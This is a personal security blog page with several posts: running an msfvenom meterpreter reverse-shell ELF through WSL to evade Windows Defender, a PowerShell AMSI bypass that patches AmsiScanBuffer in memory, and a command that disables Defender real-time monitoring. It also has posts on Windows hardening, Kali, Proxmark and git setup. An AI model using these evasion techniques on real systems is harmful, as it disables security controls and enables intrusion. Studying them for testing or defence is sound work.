Just another vulnerable WordPress site

Author: Kazmin

Bypassing Windows Defender with the Windows Subsystem for Linux!

After watching BHIS’s Sacred Cash Cow Tipping 2020 I was inspired to try out a few of the techniques BHIS demo’d, and this is a pretty fun and odd one.

There’s a few issues with WSL that make it a really poor choice for hacking without some configurations. The interesting one here is that WSL does not use VHDs or emulate linux filesystems, in fact, you can navigate to %AppData%/Local/Packages/$LinuxDistro/LocalState/rootfs and interact with the entire filesystem.

This also means that every file you make/drop to WSL is scanned by Windows Defender. Don’t even try to install metasploit.

However, as BHIS points out, elf files are not scanned by Defender. So to test this, if you fire up a normal metasploit session and do a quick msfvenom -f elf -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 > payload.elf you can simply drop it to disk and run it through WSL. A shell comes back, no questions asked.

This is pretty cool and exciting and all, but there’s a few drawbacks. The first issue is that since you’re running from a linux payload and from within WSL, you can’t use typical metasploit windows goodies like priv and kiwi without first pivoting.

The other issue is that this technique has a lot of preconditions. You need to first have initial access obviously, but you also need the target to have WSL installed, with a linux distribution installed. This is not most workstations. Installing a linux distro into WSL requires you to first enable the WSL feature in Windows, then restart the machine, and finally install the distro of your choice. Steps 1 and 3 both require administrative privileges by default, so I don’t see a practical use-case unless you can somehow install WSL without admin or the machine is preconfigued.

It’s a very neat trick though, and runs all processes through WSL, which allows you to bypass application whitelisting as well.

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

“Turn off multicast name resolution” Enabled

Don’t need SMB? Turn it off

From Services.msc Disable and Stop “Server” AKA LanmanServer. Restart.

Need SMB but worried about Eternal Blue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false


Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to powershell with admin rights. For the record, I’m not sure if this will work on a domain joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistend and it also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel, the exact code in his blog post no longer works because it contains “AmsiScanBuffer” but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open_vm_tools open_vm_tools_desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the bootloader, and if you have the same issue I did follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

sudo ./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github
git init
git add .
git remote add origin git@github.com:username/new_repo
git commit -m "First Commit!"

git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Overriding Windows TrustedInstaller Permissions

For a single file, all you have to do is:

icacls C:\FULL_PATH_TO_FILE /grant Administrators:F

For an entire directory, it’s a bit longer:

takeown /F C:\FULL_PATH_TO_FOLDER /r /d y
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Basically, this can be used to modify and overwrite Windows’s system files and other things you’re not supposed to touch. This can also be done from the GUI by assigning yourself to be the owner of the file, applying the change, closing the window, opening the permissions again, elevating to admin, and finally setting the permissions you would like.

Credit to Micah in the comments.

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2020 Kazam

Theme by Anders NorenUp ↑